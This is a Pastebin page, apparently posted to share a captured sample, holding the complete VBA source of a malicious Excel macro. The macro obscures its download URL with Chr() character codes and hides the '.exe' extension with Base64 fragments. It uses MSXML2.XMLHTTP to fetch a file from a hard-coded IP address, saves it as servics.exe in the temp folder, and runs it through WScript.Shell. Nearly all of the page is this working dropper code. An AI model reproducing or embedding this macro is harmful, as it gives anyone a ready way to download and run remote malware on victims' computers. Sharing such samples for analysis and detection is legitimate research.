dynamoo

Malicious Excel macro

Dec 23rd, 2014
339
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Sub parent()
  2. Dim WshShell
  3. Set WshShell = CreateObject("WScript.Shell")
  4. PathToSave = "%TEMP%"
  5. PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
  6. Set s = CreateObject("ADODB.Stream")
  7.     strFileURL = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(57) & Chr(53) & Chr(46) & Chr(49) & Chr(54) & Chr(51) & Chr(46) & Chr(49) & Chr(50) & Chr(49) & Chr(46) & Chr(50) & Chr(55) & Chr(58) & Chr(56) & Chr(48) & Chr(56) & Chr(48) & Chr(47) & Chr(115) & Chr(115) & Chr(116) & Chr(97) & Chr(116) & Chr(47) & Chr(108) & Chr(108) & Chr(100) & Chr(118) & Chr(115) & Chr(46) & Chr(112) & Chr(104) & Chr(112)
  8.  
  9.  
  10.     strHDLocation = PathToSave & "servics." & Chr(101) & Chr(120) & Chr(101)
  11.  
  12.  k = janu(strFileURL,strHDLocation)
  13.  Set fso = CreateObject("Scripting.FileSystemObject")
  14.  
  15. If (fso.FileExists(strHDLocation)) Then
  16.   CreateObject("WScript.Shell").run PathToSave & "servics." & Base64Decode("ZQ==") & Base64Decode("eA==") & "e"
  17. End If
  18. Set fso = Nothing
  19. End sub
  20.  
  21.  Function Base64Decode(ByVal base64String)
  22.  
  23.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  24.   Dim dataLength, sOut, groupBegin
  25.  
  26.  
  27.   base64String = Replace(base64String, vbCrLf, "")
  28.   base64String = Replace(base64String, vbTab, "")
  29.   base64String = Replace(base64String, " ", "")
  30.  
  31.   dataLength = Len(base64String)
  32.   If dataLength Mod 4 <> 0 Then
  33.     Err.Raise 1, "Base64Decode", "Bad Base64 string."
  34.     Exit Function
  35.   End If
  36.  
  37.   For groupBegin = 1 To dataLength Step 4
  38.     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
  39.     numDataBytes = 3
  40.     nGroup = 0
  41.  
  42.     For CharCounter = 0 To 3
  43.       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
  44.  
  45.       If thisChar = "=" Then
  46.         numDataBytes = numDataBytes - 1
  47.         thisData = 0
  48.       Else
  49.         thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
  50.       End If
  51.       If thisData = -1 Then
  52.         Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
  53.         Exit Function
  54.       End If
  55.  
  56.       nGroup = 64 * nGroup + thisData
  57.     Next
  58.    
  59.  
  60.     nGroup = Hex(nGroup)
  61.    
  62.     nGroup = String(6 - Len(nGroup), "0") & nGroup
  63.    
  64.     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
  65.       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
  66.       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
  67.    
  68.  
  69.     sOut = sOut & Left(pOut, numDataBytes)
  70.   Next
  71.  
  72.   Base64Decode = sOut
  73. End Function
  74.  
  75.    function janu(strFileURL,strHDLocation)
  76.    Set walabapoi = CreateObject("MsXmL2.xMLhTtP")
  77.  
  78.     walabapoi.open "GET", strFileURL, false
  79.     walabapoi.send()
  80.  
  81.     If walabapoi.Status = 200 Then
  82.       Set Newujapi = CreateObject("AdOdB.sTrEam")
  83.       Newujapi.Open
  84.       Newujapi.Type = 1
  85.  
  86.       Newujapi.Write walabapoi.ResponseBody
  87.       Newujapi.Position = 0    
  88.  
  89.       Newujapi.SaveToFile strHDLocation, 2
  90.       Newujapi.Close
  91.       Set Newujapi = Nothing
  92.     End if
  93.  
  94.     Set walabapoi = Nothing
  95.  
  96.  end function
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×